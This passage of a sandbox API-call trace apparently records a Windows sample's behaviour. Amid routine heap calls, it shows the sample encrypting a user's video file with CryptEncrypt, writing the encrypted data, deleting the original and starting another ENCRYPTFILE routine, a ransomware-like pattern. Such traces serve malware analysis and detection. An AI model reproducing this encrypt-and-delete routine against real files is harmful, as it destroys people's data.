hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.535] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0104.535] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0104.536] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0558 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac880 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0648 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.538] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.538] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.538] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.574] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac800 | out: hHeap=0x1780000) returned 1 [0104.574] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0104.574] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.574] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.574] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.575] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0xd5f0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0xd600) returned 1 [0104.575] CharLowerBuffW (in: lpsz="byte[54785]", cchLength=0xb | out: lpsz="byte[54785]") returned 0xb [0104.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.575] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.575] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144de30*=0xd5f0, dwBufLen=0xd600 | out: pbData=0x499a008*, pdwDataLen=0x144de30*=0xd600) returned 1 [0104.575] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.576] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.577] WriteFile (in: hFile=0x298, lpBuffer=0x49dce40*, nNumberOfBytesToWrite=0xd600, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x49dce40*, lpNumberOfBytesWritten=0x144e834*=0xd600, lpOverlapped=0x0) returned 1 [0104.579] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0104.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cab20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0104.579] CryptDestroyKey (hKey=0x41ac140) returned 1 [0104.579] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.579] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.580] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0104.580] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0104.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.580] FreeLibrary (hLibModule=0x756e0000) returned 1 [0104.580] CloseHandle (hObject=0x258) returned 1 [0104.580] CloseHandle (hObject=0x298) returned 1 [0104.582] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi", lpFilePart=0x0) returned 0x58 [0104.582] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\--f6foz.avi")) returned 0x20 [0104.582] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ff8cb0, ftCreationTime.dwHighDateTime=0x1d5ea29, ftLastAccessTime.dwLowDateTime=0x24650cc0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x24650cc0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0xd5f0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="--f6foz.avi", cAlternateFileName="")) returned 0x41ac780 [0104.583] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\--f6foz.avi")) returned 1 [0104.625] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ff8cb0, ftCreationTime.dwHighDateTime=0x1d5ea29, ftLastAccessTime.dwLowDateTime=0x24650cc0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x24650cc0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0xd5f0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="--f6foz.avi", cAlternateFileName="")) returned 0 [0104.626] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7a58 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0104.626] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0104.626] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0104.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0104.627] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0104.627] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0104.627] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0104.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 